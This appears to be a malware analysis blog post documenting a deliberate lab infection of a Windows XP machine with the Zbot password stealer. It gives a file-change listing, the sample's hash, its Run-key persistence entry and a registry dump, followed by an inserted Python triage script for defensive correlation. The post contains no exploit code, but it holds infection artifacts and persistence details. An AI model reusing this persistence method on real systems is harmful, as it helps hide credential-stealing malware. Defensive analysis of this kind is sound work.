C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94.idx 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\33 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\34 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\35 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\36 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\37 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\38 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\39 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\4 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\40 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\41 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\42 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\43 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\44 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\45 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\46 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\47 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\48 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\49 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\5 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\50 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\51 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\52 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\53 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\54 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\55 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\56 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\57 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\58 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\59 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\6 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\60 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\61 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\62 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\63 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\7 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\8 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\9 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\lastAccessed 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Cookies\GTT5VL6M.txt 1KB A 9/22/2012 12:30:58 PM
C:\Documents and Settings\bomber\Cookies\HR7RSVJY.txt 1KB A 9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Cookies\OCZY31FB.txt 1KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Cookies\SQUKNA2Q.txt 1KB A 9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857} 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Folders.dbx 76KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Inbox.dbx 143KB A 9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Offline.dbx 10KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Sent Items.dbx 77KB A 9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8CFA7582-04D2-11E2-A16C-08002765500A}.dat 5KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8CFA7583-04D2-11E2-A16C-08002765500A}.dat 28KB A 9/22/2012 12:29:27 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{B1CEB060-04D2-11E2-A16C-08002765500A}.dat 33KB A 9/22/2012 12:30:24 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{CE9EB670-04D2-11E2-A16C-08002765500A}.dat 12KB A 9/22/2012 12:30:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E0F1E810-04D2-11E2-A16C-08002765500A}.dat 12KB A 9/22/2012 12:31:03 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{ED37A190-04D2-11E2-A16C-08002765500A}.dat 4KB A 9/22/2012 12:31:17 PM
C:\Documents and Settings\bomber\Local Settings\Temp\au-descriptor-1.6.0_35-b10.xml 8KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temp\V.class 7KB A 9/22/2012 12:34:03 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe 289KB A 9/22/2012 12:34:06 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096 1,026KB A 9/22/2012 12:32:07 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123320_a03904 1,999KB A 9/22/2012 12:34:30 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 66KB A 9/22/2012 12:31:18 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 66KB A 9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\de[1].png 1KB A 9/22/2012 12:28:41 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\domainmap[3].gif 1KB A 9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[1].htm 1KB A 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[2].htm 1KB A 9/22/2012 12:34:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\login[2].htm 12KB A 9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\ro[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA5PUYED 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA704DOF 2KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEF3BT4 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEOTJ4L 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAVO38L3 2KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\screenshot[2].jpg 37KB A 9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA0Y1H1G 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA2KHYDQ 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA6GXH8C 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\search[1].htm 76KB A 9/22/2012 12:30:16 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\CAKLU50N.HTM 1KB A 9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\dnsd[1].css 4KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\help_16[1] 4KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\qsonhs[1].aspx 1KB A 9/22/2012 12:28:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\redir_not_found[1].htm 6KB A 9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\report[1].htm 111KB A 9/22/2012 12:30:56 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA0R10DS 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA9YH18O 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCAVXGZO1 2KB A 9/22/2012 12:30:09 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA6QGIGC 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA9XHX7I 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAAK6LMZ 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAB0WC2R 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAVTOWF0 1KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAYG9PUT 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\tabswelcome[1] 15KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\close_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\collapse_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\expand_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\google_com[1].htm 109KB A 9/22/2012 12:30:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\main[1].htm 93KB A 9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\NewTabPageScripts[2] 4KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\report[2].htm 507KB A 9/22/2012 12:30:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCA3FAUVH 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCABOLW00 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCANL4B03 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2HS76W 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2PPY3O 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCAGLGZBP 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[10] 2KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[11] 2KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\ua[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\urlquery_net[1].htm 41KB A 9/22/2012 12:28:40 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\728x90-1[1].gif 76KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\banner-fade[1].gif 2KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\domainmap[1].gif 34KB A 9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\home[1].aspx 57KB A 9/22/2012 12:33:47 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\il[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\jp[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCA9X3PTW 2KB A 9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCAVC54LS 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\screenshot[2].jpg 160KB A 9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAOZA5VK 1KB A 9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAQVDE8Y 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAUMFERF 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[10] 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[11] 1KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\top[1] 9KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\My Documents\pcap.pcapng 1,026KB A 9/22/2012 12:32:14 PM
C:\WINDOWS\Sun 1KB D
C:\WINDOWS\Sun\Java 1KB D
C:\WINDOWS\Sun\Java\Deployment 1KB D
C:\WINDOWS\Prefetch\DUMPCAP.EXE-241FFA5D.pf 37KB A 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf 71KB A 9/22/2012 12:34:01 PM
C:\WINDOWS\Prefetch\JAVAWS.EXE-021AC9A9.pf 12KB A 9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\JUCHECK.EXE-1B0E4D0A.pf 33KB A 9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf 18KB A 9/22/2012 12:31:41 PM
C:\WINDOWS\Prefetch\RUNDLL32.EXE-1EDA2CF6.pf 22KB A 9/22/2012 12:31:47 PM
C:\WINDOWS\Prefetch\SETUP_WM.EXE-3135CBD6.pf 34KB A 9/22/2012 12:33:43 PM
C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf 20KB A 9/22/2012 12:34:17 PM
C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf 53KB A 9/22/2012 12:28:58 PM
C:\WINDOWS\Prefetch\WMPLAYER.EXE-18DDEF9C.pf 59KB A 9/22/2012 12:34:04 PM
C:\WINDOWS\system32\d3d9caps.dat 1KB A 9/22/2012 12:33:59 PM
C:\WINDOWS\system32\wmpns.dll 222KB A 4/14/2008 8:00:00 AM

The cookies were not created as part of the infection. One was from MSN.com (opens by default in Windows XP), one was from URLquery.net, one was from a redirected site, which was my first attempt at infection, and the other was unrelated.

The files C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 and C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 were in "use" once the system was compromised, indicating they were being used by the application. These files are created by Java's temporary needs, and I have seen them on quite a few systems that were infected. More often, however, I have seen the folder hsperfdata_%username% empty post-infection.

myzyn.exe is recognized as PWS-Zbot.


SHA256: 0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199
File name: myzyn.exe
Detection ratio: 28 / 43
Analysis date: 2012-09-22 17:42:05 UTC ( 43 minutes ago )



Now Onto the Registry

Persistence was established through HKCU\Software\Microsoft\Windows\CurrentVersion\Run, nothing special here.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Orimdie "C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe"
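An added triage example, not part of the original post or its tooling: it parses rows in the file-delta format used above, extracts the image path from Run-key values, and ties each autorun entry to the Prefetch file that shows the binary actually executed. The sample rows are copied from this page; the function names, the user-writable path markers and the baseline set of expected executables are assumptions made for the example.

```python
import ntpath
import re
from datetime import datetime

# Rows copied from this page's file delta: path, size, attribute, timestamp.
FILE_DELTA = r"""
C:\WINDOWS\Sun\Java 1KB D
C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf 71KB A 9/22/2012 12:34:01 PM
C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf 18KB A 9/22/2012 12:31:41 PM
C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf 20KB A 9/22/2012 12:34:17 PM
C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf 53KB A 9/22/2012 12:28:58 PM
"""

# Run-key row from this page as (key, value name, data after).
RUN_ROWS = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "Orimdie",
     r'"C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe"'),
]

# Assumptions for this example: locations a standard user can write to, and
# the executables the analyst expects to have run in the lab.
USER_WRITABLE = ("\\documents and settings\\", "\\users\\")
BASELINE = {"JAVA.EXE", "WIRESHARK.EXE"}

# Paths contain spaces, so anchor on the trailing size/attribute/timestamp.
ROW = re.compile(
    r"^(?P<path>.+?) (?P<size>[\d,]+KB) (?P<attr>[A-Z]+)"
    r"(?: (?P<mtime>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M))?$")
PREFETCH = re.compile(r"^(?P<exe>.+)-(?P<hash>[0-9A-F]{8})\.pf$", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
IMAGE = re.compile(
    r'^\s*(?:"(?P<q>[^"]+)"|(?P<u>.+?\.(?:exe|scr|bat|cmd|dll))\b)', re.I)


def parse_delta(text):
    """Turn listing rows into dicts; directory rows carry no timestamp."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        mtime = m.group("mtime")
        rows.append({
            "path": m.group("path"),
            "attr": m.group("attr"),
            "mtime": datetime.strptime(mtime, "%m/%d/%Y %I:%M:%S %p")
            if mtime else None,
        })
    return rows


def prefetch_index(text):
    """Map executable name (upper case) -> (prefetch file, write time)."""
    index = {}
    for row in parse_delta(text):
        folder, name = ntpath.split(row["path"])
        m = PREFETCH.match(name)
        if m and folder.lower().endswith("\\prefetch"):
            index[m.group("exe").upper()] = (name, row["mtime"])
    return index


def correlate(run_rows, delta_text):
    """For each Run/RunOnce value, report where the image lives and whether
    a Prefetch file in the delta shows that it executed."""
    index = prefetch_index(delta_text)
    findings = []
    for key, value, data in run_rows:
        m = IMAGE.match(data)
        if not RUN_KEY.search(key) or not m:
            continue
        image = m.group("q") or m.group("u")
        # Prefetch file names keep at most 29 characters of the image name.
        exe = ntpath.basename(image).upper()[:29]
        pf_name, pf_time = index.get(exe, (None, None))
        findings.append({
            "value": value,
            "image": image,
            "user_writable": any(p in image.lower() for p in USER_WRITABLE),
            "prefetch": pf_name,
            "prefetch_written": pf_time,
        })
    return findings


def unexpected_prefetch(delta_text, baseline=BASELINE):
    """Executables with new Prefetch files that the baseline does not explain."""
    return sorted(set(prefetch_index(delta_text)) - set(baseline))


if __name__ == "__main__":
    for finding in correlate(RUN_ROWS, FILE_DELTA):
        print(finding)
    print(unexpected_prefetch(FILE_DELTA))
```

An autorun value whose image sits in a user-writable directory and has a matching new Prefetch file is the combination worth escalating first; entries returned by `unexpected_prefetch` still need to be checked against whatever else ran during the capture.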

Here is the full dump of the registry changes, which admittedly is contaminated by some legitimate Windows XP activity surrounding the first launch of some programs like Windows Media Player and my download of Java from oldversion.com, which was unexpected. I will use the lessons learned here in future studies.




backhole1 - Registry

Key Value Data Before Data After
HKEY_CLASSES_ROOT\WMP.DeskBand
HKEY_CLASSES_ROOT\WMP.DeskBand @ "Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\WMP.DeskBand.1
HKEY_CLASSES_ROOT\WMP.DeskBand.1 @ "Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9} @ "Windows Media Player"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 ThreadingModel "Apartment"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID @ "WMP.DeskBand.1"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID @ "WMP.DeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52} @ "IWMPDeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid @ "{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32 @ "{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib @ "{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib Version "1.0"
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer CLSID "{cd3afa96-b84f-48f0-9393-7edc34128127}"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0 @ "WMPDeskBand 1.0 Type Library"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS @ "0"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR @ "C:\PROGRA~1\WINDOW~2\"
HKEY_CURRENT_USER\Identities Identity Ordinal dword:00000001 dword:00000002
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857} Identity Ordinal dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 VerStamp dword:00000000 dword:00000003
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpellDontIgnoreDBCS dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 MSIMN dword:00000001
